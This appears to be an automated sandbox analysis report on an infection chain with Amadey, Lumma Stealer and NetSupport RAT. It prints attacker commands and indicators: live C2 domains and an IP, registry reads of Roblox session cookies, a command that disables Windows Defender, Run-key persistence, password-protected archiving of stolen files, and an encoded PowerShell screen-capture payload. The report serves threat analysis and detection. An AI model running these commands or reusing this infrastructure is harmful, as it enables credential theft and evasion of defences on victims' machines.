            • getmac.exe (PID: 8072 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
          • cmd.exe (PID: 7856 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 7996 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 7836 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7976 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 3848 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 8000 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 6100 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 2704 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7380 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 5064 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 8060 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • rar.exe (PID: 3620 cmdline: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
          • cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 6772 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • 8ZVMneG.exe (PID: 7444 cmdline: "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe" MD5: E8AF4D0D0B47AC68D762B7F288AE8E6E)
        • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • 8ZVMneG.exe (PID: 8152 cmdline: "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe" MD5: E8AF4D0D0B47AC68D762B7F288AE8E6E)
        • 8ZVMneG.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe" MD5: E8AF4D0D0B47AC68D762B7F288AE8E6E)
      • m9sfEU9.exe (PID: 7732 cmdline: "C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe" MD5: E5F8753995C0B30B827AA2B17F3E1D22)
        • FuturreApp.exe (PID: 1972 cmdline: "C:\Users\Public\Netstat\FuturreApp.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
        • Conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • d0ef52de9f.exe (PID: 7336 cmdline: "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
        • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • d0ef52de9f.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
      • d188864e84.exe (PID: 7360 cmdline: "C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe" MD5: 25FB9C54265BBACC7A055174479F0B70)
  • skotes.exe (PID: 2128 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: CD7686B11754D77B8722880A1A3A9A43)
  • skotes.exe (PID: 8084 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: CD7686B11754D77B8722880A1A3A9A43)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: LummaC

{"C2 url": ["awake-weaves.cyou", "immureprech.biz", "bellflamre.click", "debonairnukk.xyz", "diffuculttan.xyz", "deafeninggeh.biz", "wrathful-jammy.cyou", "sordid-snaked.cyou", "effecterectz.xyz"], "Build id": "LPnhqo--nbgnxdlxdnyo"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Netstat\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\Public\Netstat\FuturreApp.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\Public\Netstat\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\Public\Netstat\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\Public\Netstat\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 7 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000003.00000003.2268719607.0000000004F70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0000005F.00000003.2934600615.0000000001328000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  00000002.00000003.2270058738.0000000004D90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    00000059.00000002.2787455438.0000000000691000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      Click to see the 41 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      85.2.FuturreApp.exe.920000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        85.2.FuturreApp.exe.6bfe0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          81.3.m9sfEU9.exe.31f4800.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                            81.3.m9sfEU9.exe.31f4800.0.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              85.0.FuturreApp.exe.920000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 10 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Execution from Suspicious Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Netstat\FuturreApp.exe" , CommandLine: "C:\Users\Public\Netstat\FuturreApp.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Netstat\FuturreApp.exe, NewProcessName: C:\Users\Public\Netstat\FuturreApp.exe, OriginalFileName: C:\Users\Public\Netstat\FuturreApp.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe, ParentProcessId: 7732, ParentProcessName: m9sfEU9.exe, ProcessCommandLine: "C:\Users\Public\Netstat\FuturreApp.exe" , ProcessId: 1972, ProcessName: FuturreApp.exe
                                Sigma detected: New RUN Key Pointing to Suspicious Folder
                                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f8645e1e85.exe
                                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ParentProcessId: 6716, ParentProcessName: D1UL0FG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", ProcessId: 1536, ProcessName: cmd.exe
                                Sigma detected: Powershell Defender Disable Scan Feature
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ParentProcessId: 6716, ParentProcessName: D1UL0FG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 2164, ProcessName: cmd.exe
                                Sigma detected: Rar Usage with Password and Compression Level
                                Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ParentProcessId: 6716, ParentProcessName: D1UL0FG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *", ProcessId: 7532, ProcessName: cmd.exe
                                Sigma detected: Suspicious Encoded PowerShell Command Line
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                Sigma detected: Suspicious PowerShell Encoded Command Patterns
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                Sigma detected: Suspicious Script Execution From Temp Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe', ProcessId: 6396, ProcessName: powershell.exe
                                Sigma detected: Suspicious Startup Folder Persistence
                                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ProcessId: 6716, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
                                Sigma detected: Change PowerShell Policies to an Insecure Level
                                Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 